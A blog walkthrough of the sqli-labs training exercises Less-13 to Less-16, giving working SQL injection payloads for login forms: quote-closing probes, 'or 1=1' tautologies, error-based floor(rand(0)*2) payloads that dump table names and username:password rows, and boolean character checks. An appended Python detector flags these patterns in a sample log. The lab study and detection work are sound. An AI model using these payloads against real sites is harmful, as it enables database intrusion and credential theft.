Less-13
Trying username=1', password=2' gives no reaction, while username=1", password=2" produces an error.

So the closing sequence here is '). After closing it, though, statements such as order by 1 return no visible output, so error-based injection is the approach to consider:
1') union (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))#
After injecting, the response indicates more than one row, which means there is more than one column, so try adding a column:
1') union select 1,(select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))#

This successfully dumps the current database name, "security"; from here on it is routine.
Dumping tables:
1') union select 1,(select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))#

1') union select 1,(select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2)))#

Changing the limit offset dumps every table (the last one gets them all; the later steps work the same way).
Dumping columns:
1') union select 1,(select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2)))#

Dumping data:
1') union select 1,(select count(*) from information_schema.tables group by concat((select concat(username,0x3a,password) from security.users limit 0,1),floor(rand(0)*2)))#

Less-14
Trying username=1', password=2' gives no reaction, while username=1", password=2" produces an error.

So the closing here is a double quote. Construct the payload 2" or 1=1 #; testing shows it is solved the same way as Less-13.
Less-15
Trying username=1', password=2' gives no reaction, and username=1", password=2" gives no reaction either...
It may be that errors are no longer shown, so try password=1' or 1=1 # and the login succeeds...
Here the behaviour of or can be used to judge whether the payload we build after it is correct: boolean-based injection.
Dumping the database:
1' or (left((select database()),1)='s')#
For a detailed look at boolean injection see my earlier post; this can be thrown into Burp to brute-force it.
Dumping tables:
1' or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e'#
Less-16
Trying username=1', password=2' fails to log in, and username=1", password=2" fails too...
It may be that errors are no longer shown, so try password=1' or 1=1 #: login fails; password=1" or 1=1 #: login fails...
Keep going with password=1") or 1=1 #: login succeeds, finally...
The rest is the same as Less-15, with the closing characters adjusted slightly.
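As an added, defender-side example that is not part of the original post: a small Python classifier that tags login-form inputs with the injection families used across Less-13 to Less-16 (closing-context probes, or 1=1 tautologies, the floor(rand(0)*2) group-by error trick, left((select ...)) boolean checks, and information_schema enumeration) and runs it over a constructed login audit log. The log format, the client addresses and the field names uname/passwd are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlencode

# Regexes for the injection families walked through in Less-13 to Less-16.
# Values are expected to be already form-decoded.
PATTERNS = {
    # a closing-context probe: bare quote, optional ')', optional comment marker
    "context_probe": re.compile(r"""^[^'"]*['"]\)?\s*(?:#|--)?\s*$"""),
    # tautology after the closing token, e.g.  2" or 1=1 #  or  1") or 1=1 #
    "tautology": re.compile(r"""['"]\)?\s*or\s+\d+\s*=\s*\d+""", re.I),
    # duplicate-key error trick: group by concat(..., floor(rand(0)*2))
    "error_based_floor_rand": re.compile(
        r"group\s+by\s+concat\(.*floor\(\s*rand\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I | re.S),
    # boolean check on the leading character(s) of a subquery result
    "boolean_left": re.compile(
        r"\bleft\(\s*\(?\s*select\b.*\)\s*,\s*\d+\s*\)\s*=\s*'", re.I | re.S),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
}

def classify_login_input(value: str) -> list[str]:
    """Return the labels whose pattern matches; an empty list means nothing flagged."""
    return [label for label, rx in PATTERNS.items() if rx.search(value)]

def scan_login_log(lines):
    """Assumed audit-log format: '<timestamp> <client-ip> <url-encoded form body>'.
    Returns (timestamp, client_ip, field, labels) for every flagged form field."""
    findings = []
    for line in lines:
        ts, ip, body = line.rstrip("\n").split(" ", 2)
        for field, values in parse_qs(body, keep_blank_values=True).items():
            for value in values:
                labels = classify_login_input(value)
                if labels:
                    findings.append((ts, ip, field, labels))
    return findings

def _entry(ts, ip, uname, passwd):
    # one constructed log line; uname/passwd are assumed field names
    return f"{ts} {ip} {urlencode({'uname': uname, 'passwd': passwd})}"

# Constructed sample log: one legitimate login, then the probing sequence from
# the walkthrough (closing probe, tautology, error-based, boolean).
SAMPLE_LOG = [
    _entry("2024-05-01T10:00:01Z", "10.0.0.5", "alice", "O'Brien"),
    _entry("2024-05-01T10:00:07Z", "10.0.0.9", "1'", "2'"),
    _entry("2024-05-01T10:00:12Z", "10.0.0.9", '1") or 1=1 #', "x"),
    _entry("2024-05-01T10:00:30Z", "10.0.0.9",
           "1') union select 1,(select count(*) from information_schema.tables "
           "group by concat((select database()),floor(rand(0)*2)))#", "x"),
    _entry("2024-05-01T10:00:45Z", "10.0.0.9", "1' or (left((select database()),1)='s')#", "x"),
]
```

Running scan_login_log(SAMPLE_LOG) flags only the 10.0.0.9 entries; the apostrophe in O'Brien is not flagged because the probe pattern requires the quote to end the value.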
Notice:
This article is licensed under the BY-NC-SA licence. Unless otherwise noted, all content is original; when reposting, please credit 迷失的老鼠.
Original URL: sqli-labs Less-13 to Less-16